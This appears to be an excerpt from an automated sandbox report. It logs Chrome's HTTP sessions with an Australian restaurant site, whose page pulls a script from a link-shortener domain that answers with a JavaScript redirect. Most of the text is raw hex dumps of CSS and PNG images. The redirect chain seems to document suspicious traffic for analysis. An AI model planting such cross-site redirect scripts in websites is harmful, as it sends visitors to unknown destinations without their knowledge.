                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 7d 0a 20 20 2e 70 74 2d 73 6d 2d 30 2c 0a 20 20 2e 70 79 2d 73 6d 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 20 20 2e 70 72 2d 73 6d 2d 30 2c 0a 20 20 2e 70 78 2d 73 6d 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 20 20 2e 70 62 2d 73 6d 2d 30 2c 0a 20 20 2e 70 79 2d 73 6d 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 20 20 2e 70 6c 2d 73 6d 2d 30 2c 0a 20 20 2e 70 78 2d 73 6d 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 20 20 2e 70 2d 73 6d
                                                                                                                                                    Data Ascii: } .pt-sm-0, .py-sm-0 { padding-top: 0 !important; } .pr-sm-0, .px-sm-0 { padding-right: 0 !important; } .pb-sm-0, .py-sm-0 { padding-bottom: 0 !important; } .pl-sm-0, .px-sm-0 { padding-left: 0 !important; } .p-sm


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    5192.168.2.449745162.210.196.1684435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:25 UTC533OUTGET /eWD0j3 HTTP/1.1
                                                                                                                                                    Host: cuturls.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:25 UTC452INHTTP/1.1 200 OK
                                                                                                                                                    accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                                                                    connection: close
                                                                                                                                                    content-length: 479
                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:24 GMT
                                                                                                                                                    server: Cowboy
                                                                                                                                                    set-cookie: sid=5211e056-7fad-11ef-bebf-50b3f4d5315f; path=/; domain=.cuturls.net; expires=Sun, 19 Oct 2092 07:40:32 GMT; max-age=2147483647; secure; HttpOnly
                                                                                                                                                    2024-10-01 04:26:25 UTC479INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 75 72 6c 73 2e 6e 65 74 2f 65 57 44 30 6a 33 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 7a 63 32 4d 7a 6b 34 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 33 4e 7a 55 32 4e 7a 67 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62
                                                                                                                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNzc2Mzk4NSwiaWF0IjoxNzI3NzU2Nzg1LCJpc3MiOiJKb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    6192.168.2.449748162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:26 UTC629OUTGET /assets/imgs/logo.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:26 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:26 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Tue, 26 Sep 2023 19:55:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 171446
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:26 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 74 00 00 01 a7 08 06 00 00 00 a7 c9 ac d2 00 00 00 09 70 48 59 73 00 00 21 d5 00 00 21 d5 01 04 9c b4 9d 00 00 39 f0 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRtpHYs!!9iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: 74 78 b8 5a dc 55 d5 40 af aa fa cf 13 03 88 2a 03 cf 96 9f f9 d0 e6 5a bb 96 be de d9 9c 78 6a 82 b5 34 92 4b 64 61 99 e2 2d eb 16 b3 3a 94 fc fc 9e 47 18 f1 7c a4 29 28 5b 71 1e bd 77 2f 75 ae c5 4d 57 5d 46 ba ae c4 ec 45 09 66 d7 34 52 1b a6 18 42 b3 8d 12 85 94 81 d8 bd d7 18 7d e2 d7 3e d5 73 5e aa aa 81 5e 55 f5 9f 47 ab e0 70 ee 4f 17 6e 69 8a ba 50 62 0d db 1e f6 58 54 31 58 46 c4 8e ee 83 94 cd 49 16 67 1a 59 6b a7 d8 79 e6 0c 7b ba 8e 92 8a db 9c 9e 1c 63 ac 63 90 a5 46 92 89 e1 49 ce 9a 01 e3 71 4d 6d a0 99 13 48 22 ad d9 2d 15 1d 31 41 da b1 38 f1 0f 1f 59 1f 96 27 f6 53 3d 16 a0 ea cf 48 75 6c b0 ea cf 45 88 56 3d c3 cf 7d d1 69 a8 9c 45 3a 09 ba cf 38 f4 ed ea 61 99 90 48 59 a4 b3 bf c4 b6 fb 0f b1 22 68 a3 3f aa 50 06 2c 1d c3 29 49 6c db
                                                                                                                                                    Data Ascii: txZU@*Zxj4Kda-:G|)([qw/uMW]FEf4RB}>s^^UGpOniPbXT1XFIgYky{ccFIqMmH"-1A8Y'S=HulEV=}iE:8aHY"h?P,)Il
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: e2 e9 21 42 23 46 f7 c9 21 ce 5f 6b 71 cd 86 4d 74 ee 2f 70 60 62 04 65 c6 a8 99 74 59 6a 9a a4 70 08 83 88 20 93 a6 7b 46 1d 3f 9f 18 e3 db 87 3b 29 da b0 e0 aa cb 58 f8 aa 6b 18 98 a9 c8 ca 5a 16 64 eb e8 ff ee f7 c9 f7 9c 45 3b 49 2c 3f 60 e2 c8 21 9a 9b 6d d2 9b 36 d0 4b 8c 40 24 59 d4 da 84 9b 2f 30 32 38 c9 60 25 cb 69 cb 67 b2 ce 42 46 06 c2 88 33 d9 ec 50 98 db ca 0f 76 1e e0 50 49 63 c4 2c 4c cf a7 71 fe 32 b6 be fb 52 1e bf e7 59 7a f6 0c 4e bf 41 79 06 79 e5 10 69 97 4f bc ee 3c ae 39 77 1d 9f f9 c1 13 1c 18 2a f3 ca 15 8b d1 cd 06 ff f0 c0 5e 76 8d 0c 73 d1 55 e7 d3 90 30 78 fc 9e e7 f9 e5 1f 5f c4 30 13 f8 51 85 1b 36 ad e1 63 ff 78 33 c7 4f 1e a2 f3 54 1f 7b 0e 77 f3 f4 ce 43 fc ee f7 cf 73 e4 70 1f a1 96 08 c3 62 22 3b c9 0b bb 0f b0 ff f4
                                                                                                                                                    Data Ascii: !B#F!_kqMt/p`betYjp {F?;)XkZdE;I,?`!m6K@$Y/028`%igBF3PvPIc,Lq2RYzNAyyiO<9w*^vsU0x_0Q6cx3OT{wCspb";
                                                                                                                                                    2024-10-01 04:26:26 UTC16336INData Raw: e6 84 e9 b5 c3 94 b0 b9 ee b2 29 c4 e2 35 dc f7 c8 6e 4a 12 54 a5 8c 22 3d 4c ca d8 9a 4f 67 d1 e6 de df bf 48 cf 20 fc f4 e9 d5 f4 59 2e 42 78 8c bf f1 22 aa 6e ba 0e a9 d7 8e 6c 69 69 93 aa 8d 70 cf 97 2f e4 cc a6 1e ea b5 2d 2c 5b 68 73 f3 c7 66 11 56 2c 3c 59 a2 ac 58 38 07 77 52 dd dd 4b 25 ee 52 44 92 f1 0d 22 cb 16 63 a5 e2 64 b0 40 29 a1 b9 36 8e 1f d0 dc 94 e4 f6 0f 5c c2 07 ce 9e 4c 98 1c 91 72 1e 21 13 a8 38 20 3c ca 5a 08 4f fa d4 a5 41 35 52 40 35 c5 e2 20 2d 08 1a 0d 95 a1 cc 41 fe fc 93 8f d1 f9 f4 5d 4c 0e 74 74 0b 84 ac 10 4b 49 d2 f1 34 76 49 01 0d 34 b7 82 87 24 a7 6a d8 8e a4 a4 9a 78 22 40 c3 06 a1 60 0b 13 db d6 18 65 6a 3c 7a e3 a5 cb 64 10 9c 8a d4 4f 01 fa bf 5b 08 3d 76 74 fd e7 56 68 ee 41 4c d3 41 c3 45 0f 7c d4 40 85 20 0c 7a
                                                                                                                                                    Data Ascii: )5nJT"=LOgH Y.Bx"nliip/-,[hsfV,<YX8wRK%RD"cd@)6\Lr!8 <ZOA5R@5 -A]LttKI4vI4$jx"@`ej<zdO[=vtVhALAE|@ z
                                                                                                                                                    2024-10-01 04:26:26 UTC48INData Raw: 74 5a b8 b0 5f 0d 47 2a 94 cd 34 b5 5e 96 48 28 c2 cb 56 0b 9f 7b e6 00 9e 2f f9 d4 e2 16 3e 3a 4e 63 62 7f 1f 25 67 2c 37 ee ef e3 0f c3 03 44
                                                                                                                                                    Data Ascii: tZ_G*4^H(V{/>:Ncb%g,7D
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: e3 21 26 96 60 c0 b6 e8 12 3a 86 0c e1 44 0b 4c 38 63 1c 7a 58 67 df 0b 07 51 1d 1d 43 06 d8 8e 82 82 ce 25 e7 54 71 d3 f5 a3 88 9b 11 7e fe cb 83 3c b5 e6 04 79 bf 16 4c 1b d4 3c 54 12 20 63 80 47 35 83 8c a9 d6 38 77 d9 44 de 75 51 23 f3 e6 4e a0 68 fb 1c 39 91 e1 f1 e7 0e f2 d0 33 fb e8 c8 79 f8 84 99 35 29 c9 d4 49 cd 4c 1c 55 c3 94 31 55 8c aa 55 a9 4d f8 98 11 1f 11 82 b5 fb 04 43 3d 47 78 5f 6b 2d c9 b7 87 e8 39 0a df de d1 ce b3 08 fc 78 12 fd c4 71 be ff 89 6b 98 33 0b 6c b6 a2 d8 31 9e 78 b8 03 d3 8d 52 17 1a 66 ce 79 8b 32 b3 6e 79 41 fc 1f f8 f5 54 84 fe 7f 9d c9 e0 50 cf d1 93 e1 ed 6f 69 8c 9e 57 c3 38 35 44 50 76 a9 54 4a fc 3f ec 9d 67 a0 64 55 95 b6 9f 7d 62 e5 aa 9b f3 ed be dd b7 73 ce 39 40 27 72 46 51 c4 80 a0 88 a2 28 82 39 22 a6 11
                                                                                                                                                    Data Ascii: !&`:DL8czXgQC%Tq~<yL<T cG58wDuQ#Nh93y5)ILU1UUMC=Gx_k-9xqk3l1xRfy2nyATPoiW85DPvTJ?gdU}bs9@'rFQ(9"
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: 64 66 4e 48 e3 6f 3b 82 13 89 33 10 f5 a3 79 75 04 3b 3a e8 38 38 40 67 b2 94 78 70 24 8b 1f 5e bd 1b 49 7e 5d fa a4 af af 6f f5 6d b7 de 1a fd e5 af 7e 25 ab aa 3a f1 1f b9 21 a7 4e 9e 5c 7b c9 45 17 cc f0 3c cf 77 46 94 99 24 35 ed da bb 5f 97 65 f9 75 4b b3 93 a9 d4 86 6f 7e fb 5b 81 17 fe bc a2 f4 e4 a9 93 d5 f9 7c 06 6c 0f 7c 3a c1 50 c8 d9 b3 75 db ea fa 21 43 fe 66 ac 60 f3 a6 4d 2b 3f 72 dd b5 4b ff de b5 14 16 16 1d 5a b9 6a 95 ac eb be 11 00 a6 69 1e 9f 35 6d 8a 66 5a d6 19 7b db 67 2f 5a bc ee c7 3f fd d9 db dd 70 db e5 bf 32 6b 32 bb 7f 74 cb c9 f0 d3 4f 8d 0f 5b cd f4 eb 7e 22 b1 42 4a cb fb e8 2a ce 61 39 f5 54 f6 17 63 ea 0d 64 a5 2c be a2 e1 ec 3e 16 e5 27 cb 77 f2 62 4f 92 34 a0 e3 20 69 32 79 cb e1 c6 99 33 b8 73 ec 58 74 ab 8d 01 df 29
                                                                                                                                                    Data Ascii: dfNHo;3yu;:88@gxp$^I~]om~%:!N\{E<wF$5_euKo~[|l|:Pu!Cf`M+?rKZji5mfZ{g/Z?p2k2tO[~"BJ*a9Tcd,>'wbO4 i2y3sXt)
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: a1 48 0d e1 ab b8 9a 71 a4 b6 4b 96 90 d8 68 d1 46 9e dd 92 64 dd 01 0f 68 46 91 25 4c 72 28 9a c7 f6 9c c5 fa 54 3f e5 62 2d 43 62 88 a2 48 13 75 60 96 9f e6 bc c6 66 46 17 35 ea f3 50 d1 5f 20 12 c8 63 07 2c 9e 4f 59 a8 5e 14 0f 8b 3e bf 84 2a 4b 3c b4 75 1b 9f d5 6b 59 68 86 98 a9 78 7c 71 c6 44 44 df 0e 56 e6 5c b2 c2 c7 06 4e ab 9d cc 0d d3 66 50 db 9f 67 8d d5 cf 0a 39 c8 ee ae 4e 52 f9 22 fe 91 3c 5f f2 aa 8e 1b d0 40 71 f0 cb 2e 71 4b 70 46 6d 35 17 8c a9 a7 cd e9 23 9b cc 83 5e 85 25 23 48 57 20 54 9b 8c 6d 33 f1 92 2b 0e bd 0c cc ff 6d 1b 43 ff ed 9a eb 35 62 5a a2 65 c9 b8 4f dc b7 aa 23 3e 11 47 98 54 79 16 d1 42 09 64 84 82 08 23 55 17 7b 78 03 53 42 db f8 e4 c5 51 7e f4 de 99 bc f7 f4 f1 2c 6a 0a 30 36 aa 52 a1 08 6c af c4 b4 39 63 b9 fc b4
                                                                                                                                                    Data Ascii: HqKhFdhF%Lr(T?b-CbHu`fF5P_ c,OY^>*K<ukYhx|qDDV\NfPg9NR"<_@q.qKpFm5#^%#HW Tm3+mC5bZeO#>GTyBd#U{xSBQ~,j06Rl9c
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: 2e a8 25 6e 6d c7 cd 84 f8 c3 53 65 1e ea 8f 32 84 ce 3b 97 8c e3 ed 33 2d f6 ef d9 c0 83 bb 07 70 33 39 22 d4 60 a8 55 88 b8 8d de bc 93 50 cb 6e b0 5c 64 66 34 36 55 94 23 4d dc ff c8 f3 58 12 4e 5a 38 9e a9 33 ab 39 54 e8 27 38 73 2a 95 d5 01 ca dd 2b 1a 8f c6 0f 5f 76 f5 1b eb 84 10 ce 48 06 ec 85 35 2f cc cd 66 33 9b 8e b7 dd 35 6f 7e cb e2 d6 b6 d1 1b 85 10 ff ef dc 6d 21 dc ef ff f0 47 cb 2e b9 f4 f2 f3 00 8a c5 e2 fa 37 5e f3 96 b6 74 3a 15 4d d4 37 a2 05 82 7c e3 5b df 39 e3 e6 6f 7e 73 1b 70 ac 94 c0 e0 99 4b ce 50 67 2f 9c bf e1 cc c5 4b 7e 58 15 8b cb 95 4f 3f fd 99 8f fd d7 27 9e 3b ff bc f3 8e db b3 34 9d 4e 1d 8b e6 12 be ef bf 04 e2 c9 e1 e1 f2 df ad 92 f8 d4 27 3e b9 55 3d 81 1e a7 00 38 05 cf db be 17 67 dd 0e e6 98 65 6a d1 29 0d 59 e4
                                                                                                                                                    Data Ascii: .%nmSe2;3-p39"`UPn\df46U#MXNZ839T'8s*+_vH5/f35o~m!G.7^t:M7|[9o~spKPg/K~XO?';4N'>U=8gej)Y
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: ed 19 27 75 a4 41 fc 74 13 53 1a 68 91 83 e9 b6 d1 4c cf e5 44 4f 2f df ff b7 1f b0 f7 1b df 66 f3 d4 24 03 72 16 23 6a d2 9e cd 21 6c 93 30 11 a7 e4 05 4f 7f b8 4b 1d 84 ce 94 d6 a2 62 35 91 96 8f 6d 4b 94 de a0 2e 9a b8 e9 88 9a e3 92 43 a3 33 10 08 22 9a 22 c2 25 02 2d c0 d3 23 02 2b 42 6a 71 74 cd 20 2d 75 ce ef d8 c8 d5 73 5f 46 4f a6 8d 13 8d 31 8e 66 24 ed a6 cd 80 15 7f 9a 44 ba 86 42 61 23 40 05 24 f2 71 a6 93 59 c6 74 9b 8a a1 11 9a 8a 40 6f 11 5a 0d 82 78 83 89 68 82 0b df fb 17 7b f8 0d 21 b5 67 80 fe 07 2c e9 ae 39 7d b1 c5 7d 95 8a 59 47 c6 1a f8 fa 0c 81 51 a2 61 d5 a8 c6 5d 66 4d 0f 11 d7 28 e6 74 4c 5a c4 a4 87 90 0a 23 96 40 da 0e ae 69 d2 9a 3c 41 47 ad 4e 34 3e c5 dd 37 6d e3 85 4b 37 f3 f5 4f 7c 8a 45 4b 17 e1 37 5b 20 eb 58 09 8f 40
                                                                                                                                                    Data Ascii: 'uAtShLDO/f$r#j!l0OKb5mK.C3""%-#+Bjqt -us_FO1f$DBa#@$qYt@oZxh{!g,9}}YGQa]fM(tLZ#@i<AGN4>7mK7O|EK7[ X@


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    7192.168.2.449747162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:26 UTC635OUTGET /assets/imgs/cook_lunch.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:26 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:26 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 85483
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:26 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:26 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22
                                                                                                                                                    Data Ascii: <?xpacket end="w"
                                                                                                                                                    2024-10-01 04:26:26 UTC16384INData Raw: 30 90 0e 52 6f d6 c8 16 cb 6c dd bc 0b 21 05 51 18 9c 1f 0c b5 d7 d2 0e 9d f0 f9 4f 7e 8c c3 c7 4f 93 97 6b 4c a4 21 04 86 58 d3 46 4b 03 08 c1 d0 02 89 26 23 7a f8 51 0d d7 b6 08 5a 2d ec e0 0c 9e 97 23 58 3c 81 95 ab 70 f1 8f fd 01 32 eb 91 36 56 40 ac b5 0b 25 12 b4 42 12 11 c5 11 fe e8 06 86 af 7d 39 fe f0 08 ab 47 ee a1 d0 07 8b 2b 35 7a bd 0e 78 fd 24 4a b3 f1 f2 ab 11 6e 3f c6 ea 12 0b 47 9f 66 a1 51 62 6c db 25 f4 82 2c f1 ca 59 54 7c 94 6e bd 8a 19 81 76 4d 72 79 4d 26 69 62 1a 01 96 33 8a 59 5c 4f 87 06 33 0b 16 7d 7e 44 46 28 0c 27 62 76 c5 e2 6f ee 89 38 7c 72 89 2f dd fd 28 d6 d0 76 2e cf f7 d0 67 0e b3 60 6c e1 e4 43 77 e0 0f 6d a0 32 bc 85 20 b8 97 d1 6b d6 d3 5d ac f3 89 0f 9c 61 ef 59 9b d4 f3 89 a2 88 fa 8a c2 ce b8 0c af 33 39 71 26 66
                                                                                                                                                    Data Ascii: 0Rol!QO~OkL!XFK&#zQZ-#X<p26V@%B}9G+5zx$Jn?GfQbl%,YT|nvMryM&ib3Y\O3}~DF('bvo8|r/(v.g`lCwm2 k]aY39q&f
                                                                                                                                                    2024-10-01 04:26:26 UTC15252INData Raw: d2 fd 61 16 27 5f e6 e4 a3 4d 8a 4b 70 cb ed 02 42 43 e0 fa 89 12 e9 40 80 67 17 35 02 a3 dd 7c 6c 57 84 c5 17 27 c9 a7 fb e9 5b 3f 8e a4 65 29 36 63 5c 3d f9 1c f5 cb 33 0c 1d f1 d8 91 8d 53 53 b6 50 0e 5d c0 2d e6 28 cc 4d 93 ee cf 22 4b 75 7a 36 6d c3 6f 95 69 2f 9c a7 c5 3b 51 d3 1b a9 1f bf 46 38 d1 a6 5d 33 b4 d7 34 87 ce 9d 39 1d c9 9a 84 b6 df f4 00 a1 9d 77 12 76 41 b6 f3 f8 34 90 5c 01 d7 0b d0 72 3d a4 b6 43 22 1a a6 d5 69 e3 99 0e 46 ad 49 0d e8 e0 b0 24 40 d0 b7 70 17 16 b8 f2 e4 4b dc 73 c7 dd fc d6 1f 7e 8a 16 20 a8 2a 85 d5 65 3e fe 4b 1f e6 d2 ec 0a fd aa f0 aa eb 62 0d 33 2c 88 12 aa ec 33 97 f3 b8 75 cf 56 7e fb 0f 3e 43 c5 7c b5 6f 06 04 e5 d5 14 d2 57 03 62 5c d7 c7 73 c0 73 6c 1c 1f 82 89 28 37 9e 3f 41 73 ea 1c 83 e3 9b 71 44 0d 79
                                                                                                                                                    Data Ascii: a'_MKpBC@g5|lW'[?e)6c\=3SSP]-(M"Kuz6moi/;QF8]349wvA4\r=C"iFI$@pKs~ *e>Kb3,3uV~>C|oWb\ssl(7?AsqDy
